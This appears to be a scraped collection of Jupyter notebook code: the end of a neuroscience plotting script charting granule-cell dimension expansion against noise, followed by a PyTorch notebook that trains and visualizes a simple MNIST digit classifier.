mpd,
x='noise',
y='grc_dim',
hue='model',
context='paper',
palette=palette,
linewidth=1,
# log_scale_y=True,
width=10,
# ylim=[.9, 1.1],
y_axis_label='Dim. Expansion ($x$)',
x_axis_label='MF Input Variation (%)',
title='noise',
save_filename=f'{script_n}.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim_norm2',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
ylim=[0, 1.05],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_rel_noise_reduction.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim_norm3',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
ylim=[.5, 1.8],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_rel_noise_reduction2.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_pop_corr_norm',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
# ylim=[0, 1.05],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_popcorr.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
# ylim=[0, 1.05],
y_axis_label='Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_noise_reduction.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_by_mf_dim',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
# ci=68,
width=3.5,
height=3,
# ylim=[.9, 1.1],
y_axis_label='Dim. Expansion ($x$)',
x_axis_label='Graded Variation (%)',
# title='noise',
save_filename=f'{script_n}_dim_expansion.svg',
show=True,
)
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/RoisulIslamRumi/MNIST-PyTorch/blob/main/MNist_with_Pytorch.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
#Import required libraries
import torch #imports all essential modules to build NN
import torchvision #to preprocess and transforma the data
import torch.nn as nn
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from torch import optim
import numpy as np
%matplotlib inline
```
Normalize does the following for each channel:
**image = (image - mean) / std**
The parameters **mean**, **std** are passed as 0.5, 0.5 which will normalize the image in the range [-1,1]. For example, the minimum value 0 will be converted to (0-0.5)/0.5=-1, the maximum value of 1 will be converted to (1-0.5)/0.5=1.
To get your image back in [0,1] range the equation would be:
image = ((image * std) + mean)
```
mean = 0.5
std = 0.5
#'Transforms' converts the images to tensor and preprocess them to normalize
# with a SD of 1
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean, std)])
trainset = torchvision.datasets.MNIST('~/.pytorch/MNIST_data/', train=True,
transform=transform, download=True)
trainloader = torch.utils.data.DataLoader(trainset,batch_size=64, shuffle=True)
num_of_images = trainloader.dataset.data.shape[0]
height = trainloader.dataset.data.shape[1]
width = trainloader.dataset.data.shape[2]
input_size = height * width
hidden_layers = [128,64]
output_size = 10
from torch.nn.modules.linear import Linear
model = nn.Sequential(nn.Linear(input_size,hidden_layers[0]),
nn.ReLU(),
nn.Linear(hidden_layers[0],hidden_layers[1]),
nn.ReLU(),
nn.Linear(hidden_layers[1], output_size),
nn.LogSoftmax(dim=1)
)
print(model)
criterion = nn.NLLLoss()
optimizer = optim.SGD(model.parameters(), lr = 0.003)
epochs = 5
loss = 0
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
#Flatten the image from 28*28 to 784*1 column vector
images = images.view(images.shape[0], -1)
#set grad to 0
optimizer.zero_grad()
output = model(images)
loss = criterion(output,labels)
#backprop
loss.backward()
#update the grads
optimizer.step()
running_loss += loss.item()
loss = running_loss
print("Training loss:",(loss/len(trainloader)))
def view_classify(img, ps):
ps = ps.data.numpy().squeeze()
fig, (ax1, ax2) = plt.subplots(figsize=(6,9), ncols=2)
ax1.imshow(img.resize_(1, 28, 28).numpy().squeeze())
ax1.axis('off')
ax2.barh(np.arange(10), ps)
ax2.set_aspect(0.1)
ax2.set_yticks(np.arange(10))
ax2.set_yticklabels(np.arange(10))
ax2.set_title('Class Probability')
ax2.set_xlim(0, 1.1)
plt.tight_layout()
# Getting the image to test
images, labels = next(iter(trainloader))
img = images[0].view(1,784)
with torch.no_grad():
logps = model(img)
ps = torch.exp(logps)
view_classify(img,ps)
```
|
github_jupyter
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.